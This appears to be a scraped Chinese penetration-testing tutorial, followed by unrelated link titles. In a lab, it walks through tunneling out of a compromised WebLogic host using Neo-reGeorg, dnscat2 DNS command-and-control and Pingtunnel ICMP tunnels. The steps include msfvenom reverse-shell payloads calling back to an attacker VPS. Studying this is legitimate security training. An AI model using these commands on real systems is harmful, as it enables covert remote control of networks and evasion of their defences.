当前位置: 首页 > news >正文

代理网站推荐教务系统

代理网站推荐,教务系统,北京的制作网站的公司,太原微信网站开发本文仅限于安全研究和学习#xff0c;用户承担因使用此工具而导致的所有法律和相关责任#xff01; 作者不承担任何法律和相关责任#xff01; HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目#xff0c;目的是#xff1a; 提高可用性#xff0…       本文仅限于安全研究和学习用户承担因使用此工具而导致的所有法律和相关责任 作者不承担任何法律和相关责任 HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目目的是 提高可用性避免特征检测 提高 tunnel 连接安全性 提高传输内容保密性 应对更多的网络环境场景下使用 靶场环境cve-2017-10271  weblogic #靶场攻击过程使用脚本工具得到shell在此略过 1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器 2.使用蚁剑上传JSP文件 上传至此目录可以访问到文件 /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ 3.使用 neoreg.py 连接WEB服务器在本地建立 socks 代理代理默认端口 1080 修改配置文件vim proxychains4.conf 执行命令 #测试代理 proxychains curl 127.0.0.1:7001 DNS隧道 Dnscat2 dnscat2是一个DNS隧道工具通过DNS协议创建加密的命令和控制通道它的一大 特色就是服务端会有一个命令行控制台所有的指令都可以在该控制台内完成。包 括文件上传、下载、反弹Shell。 直连模式客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。 中继模式像我们平时上网一样DNS解析先经过互联网的迭代解析最后指向我们 的恶意DNS服务器。相比直连速度较慢但是更安全。 服务端安装 apt install ruby ruby-dev git make g ruby-bundler gem install bundler git clone https://github.com/iagox86/dnscat2.git也可以先下载文件然后上传至VPS cd dnscat2/server bundle install   #如此命令报错和本地网络有关多试几次 客户端编译 Linux git clone https://github.com/iagox86/dnscat2.git   cd dnscat2/client/ make   Windows 下载Windows版本 在本地编译上传 上传已经编译好的 .exe程序 make编译之后会在此目录下生成一个dnscat可执行二进制文件。 Linux systemd-resolve占用53端口的解决方法 https://www.itren.org/319.html Dnscat2直连模式 启动服务端 ruby ./dnscat2.rb 启动客户端 vps收到会话 help windows 进入session 1: session -i 1 shell    #获取主机shell 进入session 2 : session -i 2 执行命令 whoami 直连模式流量特征:tcpdump udp dst port 53 Dnscat2中继模式 环境准备  1. 一台公网CC服务器       2. 一台内网靶机              #以win7为例 3. 一个可配置解析的域名 配置DNS域名解析 创建A记录将自己的域名解析服务器ns.hack.com指向云服务器VPS IP A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx 创建NS记录将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com NS解析是在告诉域名系统想要知道 dns.hack.com 的IP地址就去问ns.hacker.com  vps防火墙设置开放全部UDP端口 启动服务端 ruby ./dnscat2.rb dns.xxx.xxx --secretabcd secret --指定密码 启动客户端 server #指定VPS地址 服务端收到session 3 获取shell 进入会话session -i 4 执行命令 whoami ICMP隧道 Pingtunnel ICMP隧道       通过某种信道获取了内网主机的shell但是当前信道不适合做远控的通信信道 tcp 和 udp 等传输层协议不能出网 dns 、 http 等应用层协议也不能出网只有 icmp 协议可以出网。 目的上线仅icmp协议出网的内网主机 ICMP隧道转发TCP上线MSF 1.VPS启动ICMP隧道服务端 ./pingtunnel -type server -noprint 1 -nolog 1 2.靶机启动ICMP隧道客户端 pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1 3. MSF 生成反弹 shell 的 payload 上传到靶机 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost127.0.0.1 lport9999 -f exe hot.exe 4.执行 payload 反弹 shell 到 MSF 设置侦听 msfconsole use exploit/multi/handler set lhost xx.xx.xx.xx   (vps的内网IP) set lport 8866 set payload windows/x64/meterpreter/reverse_tcp exploit 5. 靶机执行payload,msf上线 ICMP隧道转发Socks上线MSF 1. VPS启动ICMP隧道服务端 ./pingtunnel -type server -noprint 1 -nolog 1 2.靶机启动ICMP隧道客户端 pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1 #  icmp隧道客户端监听127.0.0.1:9999启动socks5服务     通过连接到VPS IP的icmp隧道     由icmpserver转发socks5代理请求到目的地址 VPSIP:8899 3.MSF 生成反弹 shell 的 payload 上传到靶机并执行 msfvenom -p windows/x64/meterpreter/reverse_tcp lhostVPSIP lport8866 HttpProxyTypeSOCKS HttpProxyHost127.0.0.1 HttpProxyPort9999 -f exe c2.exe 5.设置侦听 handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866 #IP是vps的内网IP 6.MSF收到会话 可以执行命令 参考 内网渗透之内网穿透 - 先知社区 ...
http://www.dnsts.com.cn/news/105837.html

相关文章:

  • 丽水网站建设微信推广成都网站建设公司好做吗
  • 二手商品网站的设计与建设论文开网店需要什么流程
  • 建设网站群国外刺绣图案设计网站
  • 河北网站建设推广wordpress本地怎么搬家
  • 住房和城乡建设部网站 事故网站源码被注册为商标
  • 网站页面设计欣赏企业网站如何设计
  • 云南建设厅网站房地产开发资质delphi WordPress
  • 深圳网站设计权威乐云践新门户网站建设解决方案
  • 设计师网站登录青岛 正规网站空间
  • 做解析视频网站怎么赚钱个人导航网站如何赚钱
  • 网站开发文档要求手机网站菜单网页怎么做的
  • 门头沟营销型网站建设wordpress x theme
  • 在线教育网站开发文档内蒙古两学一做网站
  • 没有rss源的网站如何做rss订阅太原网页制作服务
  • 新网站怎么做seo 风享浙江省火电建设公司网站
  • 做跨境电商有没推荐的网站在线制作免费生成图片logo
  • 济南网站建设设计计算机包含哪些专业
  • 网站建设终身不用维护手机网站创建
  • 海南建设银行官方网站编写软件的软件
  • 三亚本地网站建设免费推广做产品的网站
  • 百度的企业网站如何自己创造一个网站平台
  • 芜湖营销型网站建设网站添加在线支付功能
  • 免费php网站网页设计个人网站作业
  • 惠州淘宝网站建设中国建设银行的网站色彩
  • 谷歌网站怎么设置才能打开网站兴宁区住房和城乡建设局网站
  • 兰州最好的网站开发公司学历提升机构的套路
  • 淄博百度网站做微信网站
  • 关于建设校园网站申请报告建造电商网站
  • 2023免费网站推广企业网站建设方案价位
  • 成熟的网站怎么做seo推广网站被k怎么办